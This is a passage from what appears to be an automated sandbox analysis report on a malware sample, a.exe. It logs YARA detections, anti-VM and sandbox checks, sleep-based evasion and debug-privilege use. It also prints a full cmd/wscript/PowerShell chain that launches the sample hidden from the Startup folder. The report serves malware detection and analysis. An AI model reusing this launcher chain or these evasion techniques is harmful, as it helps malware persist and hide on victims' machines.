                  Source: a.exe, 0000000D.00000002.952842213.0000000002DF1000.00000004.00000001.sdmp, a.exe, 00000014.00000002.870308701.0000000002EE1000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
                  Yara detected Beds ObfuscatorShow sources
                  Source: Yara matchFile source: 00000011.00000002.876240165.0000000007590000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.710604971.0000000003889000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.775905725.0000000003969000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.715456049.0000000006E20000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.854642346.0000000003A89000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.789219576.0000000007530000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: a.exe PID: 6200, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: a.exe PID: 6772, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: a.exe PID: 740, type: MEMORY
                  Source: Yara matchFile source: 1.2.a.exe.6e20000.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.a.exe.7530000.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.a.exe.3a89990.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.a.exe.3889990.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.a.exe.3969990.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.a.exe.3a89990.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.a.exe.7590000.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.a.exe.3969990.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.a.exe.7590000.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.a.exe.6e20000.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.a.exe.3889990.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.a.exe.7530000.5.raw.unpack, type: UNPACKEDPE
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeThread delayed: delay time: 10800000
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeThread delayed: delay time: 10799657
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeThread delayed: delay time: 10799391
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeThread delayed: delay time: 10799266
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeThread delayed: delay time: 10799141
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeThread delayed: delay time: 10798860
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeThread delayed: delay time: 10798704
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeThread delayed: delay time: 10798594
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeThread delayed: delay time: 10798438
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeThread delayed: delay time: 10798297
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeThread delayed: delay time: 10798079
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeThread delayed: delay time: 10797907
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeThread delayed: delay time: 10797704
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeThread delayed: delay time: 10797500
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeThread delayed: delay time: 10797204
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeThread delayed: delay time: 10796750
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeThread delayed: delay time: 10796500
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeThread delayed: delay time: 10796313
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeThread delayed: delay time: 10796110
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeThread delayed: delay time: 10795954
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeThread delayed: delay time: 10795813
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeThread delayed: delay time: 10795500
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeThread delayed: delay time: 10795360
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeThread delayed: delay time: 10795204
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeThread delayed: delay time: 10795063
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeThread delayed: delay time: 10794907
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeThread delayed: delay time: 10794750
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeThread delayed: delay time: 10794610
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeThread delayed: delay time: 10794485
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeThread delayed: delay time: 10794344
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeThread delayed: delay time: 10794063
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeThread delayed: delay time: 10793954
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeThread delayed: delay time: 10789125
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeThread delayed: delay time: 10789016
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeThread delayed: delay time: 10788907
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeThread delayed: delay time: 10788750
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeThread delayed: delay time: 10788641
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeThread delayed: delay time: 10788500
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeThread delayed: delay time: 10788391
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeThread delayed: delay time: 10788250
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-Timer
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1905
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 833
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeWindow / User API: threadDelayed 3271
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeWindow / User API: threadDelayed 5739
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6676Thread sleep count: 1905 > 30
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6736Thread sleep count: 833 > 30
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6692Thread sleep count: 43 > 30
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3040Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6724Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 4928Thread sleep time: -30000s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 584Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500Thread sleep time: -21213755684765971s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500Thread sleep time: -10800000s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500Thread sleep time: -10799657s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500Thread sleep time: -10799391s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500Thread sleep time: -10799266s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500Thread sleep time: -10799141s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500Thread sleep time: -10798860s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500Thread sleep time: -10798704s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500Thread sleep time: -10798594s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500Thread sleep time: -10798438s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500Thread sleep time: -10798297s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500Thread sleep time: -10798079s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500Thread sleep time: -10797907s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500Thread sleep time: -10797704s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500Thread sleep time: -10797500s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500Thread sleep time: -10797204s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500Thread sleep time: -10796750s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500Thread sleep time: -10796500s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500Thread sleep time: -10796313s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500Thread sleep time: -10796110s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500Thread sleep time: -10795954s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500Thread sleep time: -10795813s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500Thread sleep time: -10795500s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500Thread sleep time: -10795360s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500Thread sleep time: -10795204s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500Thread sleep time: -10795063s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500Thread sleep time: -10794907s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500Thread sleep time: -10794750s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500Thread sleep time: -10794610s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500Thread sleep time: -10794485s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500Thread sleep time: -10794344s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500Thread sleep time: -10794063s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500Thread sleep time: -10793954s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500Thread sleep time: -100000s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500Thread sleep time: -99859s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500Thread sleep time: -99750s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500Thread sleep time: -99640s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500Thread sleep time: -99531s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500Thread sleep time: -99422s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500Thread sleep time: -99312s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500Thread sleep time: -99203s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500Thread sleep time: -99094s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500Thread sleep time: -98984s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500Thread sleep time: -98875s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500Thread sleep time: -98765s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500Thread sleep time: -98640s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500Thread sleep time: -98515s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500Thread sleep time: -98406s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500Thread sleep time: -98281s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500Thread sleep time: -98125s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500Thread sleep time: -98015s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500Thread sleep time: -97906s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500Thread sleep time: -97797s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500Thread sleep time: -97687s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500Thread sleep time: -97578s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500Thread sleep time: -97469s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500Thread sleep time: -97359s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500Thread sleep time: -97250s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500Thread sleep time: -97125s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500Thread sleep time: -97015s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500Thread sleep time: -96906s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500Thread sleep time: -96797s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500Thread sleep time: -96640s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500Thread sleep time: -96531s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500Thread sleep time: -96422s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500Thread sleep time: -96312s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500Thread sleep time: -96203s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500Thread sleep time: -96094s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500Thread sleep time: -95953s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500Thread sleep time: -95844s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500Thread sleep time: -95703s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500Thread sleep time: -95594s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500Thread sleep time: -95484s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500Thread sleep time: -95375s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500Thread sleep time: -10789125s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500Thread sleep time: -10789016s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500Thread sleep time: -10788907s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500Thread sleep time: -10788750s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500Thread sleep time: -10788641s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500Thread sleep time: -10788500s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500Thread sleep time: -10788391s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500Thread sleep time: -10788250s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 5676Thread sleep time: -30000s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 6884Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 5464Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM WIN32_PROCESSOR
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeFile Volume queried: C:\ FullSizeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
                  Source: powershell.exe, 0000000A.00000002.823826919.0000000005038000.00000004.00000001.sdmpBinary or memory string: Hyper-V
                  Source: powershell.exe, 0000000A.00000002.823826919.0000000005038000.00000004.00000001.sdmpBinary or memory string: e:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
                  Source: a.exe, 00000001.00000002.715744246.00000000072C0000.00000002.00000001.sdmp, a.exe, 0000000B.00000002.787547923.0000000006A00000.00000002.00000001.sdmp, a.exe, 00000011.00000002.873462654.0000000006F20000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
                  Source: a.exe, 00000014.00000002.870308701.0000000002EE1000.00000004.00000001.sdmpBinary or memory string: vmware
                  Source: a.exe, 00000014.00000002.866618994.0000000000402000.00000040.00000001.sdmpBinary or memory string: EnableAntiVMware
                  Source: a.exe, 00000001.00000002.715744246.00000000072C0000.00000002.00000001.sdmp, a.exe, 0000000B.00000002.787547923.0000000006A00000.00000002.00000001.sdmp, a.exe, 00000011.00000002.873462654.0000000006F20000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
                  Source: a.exe, 00000001.00000002.715744246.00000000072C0000.00000002.00000001.sdmp, a.exe, 0000000B.00000002.787547923.0000000006A00000.00000002.00000001.sdmp, a.exe, 00000011.00000002.873462654.0000000006F20000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
                  Source: a.exe, 00000001.00000002.708980355.0000000000B2E000.00000004.00000020.sdmp, a.exe, 0000000B.00000002.771565710.0000000000DC7000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: a.exe, 00000001.00000002.715744246.00000000072C0000.00000002.00000001.sdmp, a.exe, 0000000B.00000002.787547923.0000000006A00000.00000002.00000001.sdmp, a.exe, 00000011.00000002.873462654.0000000006F20000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
                  Source: a.exe, 00000011.00000002.839119724.0000000000C8A000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllNN
                  Source: C:\ProgramData\a.exeProcess information queried: ProcessInformation
                  Source: C:\ProgramData\a.exeProcess token adjusted: Debug
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess token adjusted: Debug
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess token adjusted: Debug
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess token adjusted: Debug
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess token adjusted: Debug
                  Source: C:\ProgramData\a.exeMemory allocated: page read and write | page guard

                  HIPS / PFW / Operating System Protection Evasion:

                  barindex
                  .NET source code references suspicious native API functionsShow sources
                  Source: 13.2.a.exe.400000.0.unpack, CC2/LCs.csReference to suspicious API methods: ('WXK', 'VirtualProtect@kernel32'), ('LXr', 'GetProcAddress@kernel32'), ('lXy', 'LoadLibrary@kernel32')
                  Source: 13.2.a.exe.400000.0.unpack, oXs/KX8.csReference to suspicious API methods: ('EBg', 'GetProcAddress@kernel32'), ('UBW', 'LoadLibrary@kernel32')
                  Source: 13.2.a.exe.400000.0.unpack, DCX/jCC.csReference to suspicious API methods: ('FCK', 'MapVirtualKey@user32.dll')
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 4
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\wscript.exe' 'C:\Users\user\AppData\Local\Temp\\499262.js'
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command Start-Sleep -s 4; Start-Process -WindowStyle hidden -FilePath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe'
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe'
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe
                  Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c timeout 4 & 'C:\Windows\System32\wscript.exe' 'C:\Users\user\AppData\Local\Temp\\499262.js' && powershell -command Start-Sleep -s 4; Start-Process -WindowStyle hidden -FilePath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe'
